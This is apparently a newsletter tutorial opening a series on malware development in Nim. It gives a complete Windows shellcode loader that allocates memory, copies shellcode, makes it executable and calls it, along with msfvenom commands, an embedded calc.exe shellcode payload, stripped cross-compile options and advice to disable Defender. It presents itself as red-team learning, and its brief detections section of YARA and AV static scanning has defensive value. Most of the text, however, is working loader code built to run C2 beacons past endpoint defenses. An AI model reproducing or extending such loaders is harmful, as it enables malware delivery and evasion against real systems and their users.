Intro to Maldev with Nim

This will be the first of a series on building shellcode loaders with Nim. In this one we’ll talk about the basics of a shellcode loader and give you everything you need to get started. We’ll add evasion techniques, process injection, and tighten OPSEC over the next several issues.

Why Maldev?

If we really want to defend an environment we have to test its controls. The default settings are always insecure and often the EDR and AV solutions we use are in a near default state. Also maldev is fun. Learning the Windows API without the goal of getting past an EDR would be impossibly boring. I’ll show you the basics of it here. Nothing here on its own should get by EDR without work. Defender isn’t an EDR though and without a lot of work you can get past a lot by just obfuscating or encrypting your payload before executing it.

Why Nim?

What first brought me to Nim was the name. I thought it was cool and it reminded me of the Rats of NIMH, but there is no relation. It's extremely portable with mingw. I compile Windows binaries from Nim on every platform. The syntax reminds me of Python and it isn't overly verbose.

Shellcode Loaders

A shellcode loader is a tiny program whose only job is to execute shellcode. You’re gonna want one of these when you can execute code on a target. That could be from maldocs, trojans, or an exploit. The shellcode you use is typically a C2 beacon from Cobalt Strike, Sliver, and elsewhere. These C2s are heavily signatured so if you write them to disk or they get scanned in memory then you’re gonna fire alerts. The art of shellcode loaders is executing the shellcode in memory without alerting the EDR. We’re going to go over a simple one here in Nim.

import winim/lean

# Replace with your own payload. Generate one with:
#   msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o sc.bin
#   xxd -i sc.bin
# Placeholder below is a single `ret` so the program exits cleanly.
const shellcode: array[1, byte] = [0xC3.byte]

We have some basic Nim code that will take shellcode from Metasploit and execute it. The first important thing to note is the winim library. It’s the WinAPI library and is how we can use the Windows API so easily. /lean imports the Win32 API only without COM, macros, and other stuff.

The shellcode is a placeholder with a single ret. Metasploit can generate raw position-independent shellcode, so we can use it. However, you can’t just copy paste a PE binary into the code. The payload needs to be shellcode that can execute from wherever it lands in memory.

proc main() =
    # 1. Allocate a region of memory we can write to 
   
    let mem = VirtualAlloc(
        nil,
        cast[SIZE_T](shellcode.len),
        MEM_COMMIT or MEM_RESERVE,
        PAGE_READWRITE
    )
    if mem == nil:
        echo "alloc failed: ", GetLastError()
        return

Our first step is to allocate some memory with the VirtualAlloc WinAPI call. VirtualAlloc is how we get Windows to give us a region of memory in our own process. It hands us a pointer to a mapped region we control.

The arguments:

nil - The address we want. Since we’re in the shellcode loader we don’t care. We let Windows pick.
shellcode.len - how many bytes we need to hold our shellcode. Windows will round this up to a 4KB page on x64.
MEM_COMMIT or MEM_RESERVE - Windows has two steps for memory allocation: reserving address space, and making it usable.
PAGE_READWRITE - the protection we want on the page. We need to write the shellcode bytes into it. In the next step we’ll flip it to executable.

# 2. Copy shellcode into the writable region.
    copyMem(mem, unsafeAddr shellcode[0], shellcode.len)

copyMem is Nim's wrapper around memcpy. It takes a destination pointer, a source pointer, and a byte count, and copies one to the other. The destination is the memory we just got from VirtualAlloc.

# 3. Flip the page from RW to RX. Now executable, no longer writable.
    var oldProtect: DWORD
    if VirtualProtect(
        mem,
        cast[SIZE_T](shellcode.len),
        PAGE_EXECUTE_READ,
        addr oldProtect
    ) == 0:
        echo "VirtualProtect failed: ", GetLastError()
        return

VirtualProtect changes the protection on the memory we already own. We point it at the region we got from VirtualAlloc, tell it the new protection should be PAGE_EXECUTE_READ (RX, readable and executable, no longer writable), and pass it a DWORD to receive the old protection value. Windows requires we pass it a DWORD to receive the old protection value, even if we don't plan to use it.

# 4. Cast the memory address to a function pointer and call it.
    let fn = cast[proc() {.cdecl.}](mem)
    fn()

main()

mem is the address that points to our shellcode. The cast allows us to call this as a function. This will execute the shellcode.

Ok, now it’s time to build it. Since this is Nim, we can compile this anywhere.

For Windows:

nim c -d:release loader.nim

Cross-compiling from Linux or macOS

We just need the mingw toolchain to cross-compile. We just pass -d:mingw and we can compile to Windows targets.

# Ubuntu / Debian
sudo apt install mingw-w64

# macOS
brew install mingw-w64

# Cross-compile to Windows x64
nim c -d:mingw -d:release --cpu:amd64 loader.nim

Yay it works. Now let’s do something useful. Let’s generate calc.exe shellcode with msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o sc.bin, then xxd -i sc.bin to get the C array form.

Putting it all together: shellcode loader with calc

import winim/lean


#   msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o sc.bin
#   xxd -i sc.bin

const shellcode: array[276, byte] = [
byte 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00,
0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7,
0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41,
0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed,
0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b,
0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88,
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67,
0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56,
0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48,
0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1,
0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24,
0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41,
0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49,
0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a,
0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83,
0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff,
0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d,
0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b,
0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2,
0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c,
0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47,
0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89,
0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e,
0x65, 0x78, 0x65, 0x00
]


proc main() =
    # 1. Allocate RW only. No execute bit yet.
    let mem = VirtualAlloc(
        nil,
        cast[SIZE_T](shellcode.len),
        MEM_COMMIT or MEM_RESERVE,
        PAGE_READWRITE
    )
    if mem == nil:
        echo "alloc failed: ", GetLastError()
        return

    # 2. Copy shellcode into the writable region.
    copyMem(mem, unsafeAddr shellcode[0], shellcode.len)

    # 3. Flip the page to RX. Now executable, no longer writable.
    var oldProtect: DWORD
    if VirtualProtect(
        mem,
        cast[SIZE_T](shellcode.len),
        PAGE_EXECUTE_READ,
        addr oldProtect
    ) == 0:
        echo "VirtualProtect failed: ", GetLastError()
        return

    # 4. Cast and call.
    let fn = cast[proc() {.cdecl.}](mem)
    fn()

main()

So here we need to disable Defender because the shellcode as generated from msfvenom will get detected by Defender and it will eat our compiled binary.

And let’s change our compile options to make our executable smaller and strip out what we don’t need.

# Windows
nim c -d:danger -d:strip --opt:size --passC:-flto --passL:-flto loader.nim

# Linux & macOS
nim c -d:mingw -d:danger -d:strip --opt:size --passC:-flto --passL:-flto --cpu:amd64 loader.nim

-d:mingw - Use mingw to compile to Windows.
-d:danger - turn off all runtime safety checks (bounds, overflow, nil deref).
-d:strip - strip debug info and symbol tables
--opt:size - optimize for binary size instead of speed
--passC:-flto - link-time optimization in the C compiler
--passL:-flto - link-time optimization in the linker, lets it drop unused code across compilation units
--cpu:amd64 - produce x64 output. Default on a 64-bit Windows host so it's omitted there. Required when cross-compiling so Nim doesn't accidentally produce a 32-bit binary that won't run x64 shellcode

Once we’ve done that we can execute.

calc executes from loader.

Before we wrap up, run strings against the compiled binary:

gat0r@bast:/mnt/c/loader$ strings loader.exe | grep VirtualAlloc
VirtualAlloc
VirtualAlloc

VirtualAlloc shows up twice. PE binaries store imported function names in the import table by default. The OS loader needs them to resolve the actual addresses at process startup, so stripping doesn't touch them.

We can confirm with objdump:

gat0r@bast:/mnt/c/loader$ x86_64-w64-mingw32-objdump -p loader.exe | grep -A 20 "DLL Name: KERNEL32"
        DLL Name: KERNEL32.dll
        vma:  Hint/Ord Member-Name Bound-To
        2271c      20  AddVectoredExceptionHandler
        2273a     141  CloseHandle
        22748     197  CreateEventA
        22758     243  CreateSemaphoreA
        2276c     283  DeleteCriticalSection
        22784     313  DuplicateHandle
        22796     319  EnterCriticalSection
        227ae     443  FreeLibrary
        227bc     552  GetCurrentProcess
        227d0     553  GetCurrentProcessId
        227e6     556  GetCurrentThread
        227fa     557  GetCurrentThreadId
        22810     627  GetHandleInformation
        22828     630  GetLastError
        22838     651  GetModuleHandleA
        2284c     710  GetProcAddress
        2285e     711  GetProcessAffinityMask
        22878     743  GetStartupInfoA
        2288a     769  GetSystemTimeAsFileTime

objdump ships with binutils on Linux. On Windows you can use dumpbin /imports loader.exe from a Visual Studio command prompt, or PE-Studio if you prefer a GUI.

Most of those imports aren't from our code. We never called AddVectoredExceptionHandler, CreateSemaphoreA, or EnterCriticalSection. Those come from the Nim runtime, the bits Nim links into every compiled binary to handle threading, exceptions, and memory management. Even our small loader drags this whole import set along with it. A Nim binary's import table is a pretty distinctive fingerprint, and detection engineers have noticed.

This is what an analyst sees in the first 30 seconds of examining your binary. PE-Studio, CFF Explorer, and most automated tools lead with the import table. These API names give away the behavior of the binary.

Hiding API names from static analysis is solvable. You can resolve them at runtime via LoadLibrary and GetProcAddress, or skip the names entirely with hash-based resolution. We'll get there in a future issue.

Detections & Mitigations

Defensive Tools & Detections:

YARA. Signatures targeting the embedded msfvenom shellcode stub will
fire on the bytes sitting in the binary regardless of how we load them.
AV static scanning. Will flag known msfvenom payloads on disk before
the loader ever runs, since the bytes are in the binary in plaintext.

Alright we’ve written a short shellcode loader that demonstrates the concepts needed to move forward. It will get flagged by Defender for the msfvenom payload. Even if it didn’t the import table might give us away on static analysis. Next issue we’ll move out of our own process and run code in someone else’s with process injection. We’ll also encrypt/encode our payload so it isn’t immediately eaten. After that, suspended process targets, callback function abuse, Early Bird APC, and direct syscalls. Each issue will further close detection paths and by the end of the series we’ll have a loader and you’ll understand the OPSEC tradeoffs we make for each step.

If you found this useful, forward it to someone who’d actually read it.

Got questions, corrections, or want to argue about something? Just hit reply. I read everything.

— Jeff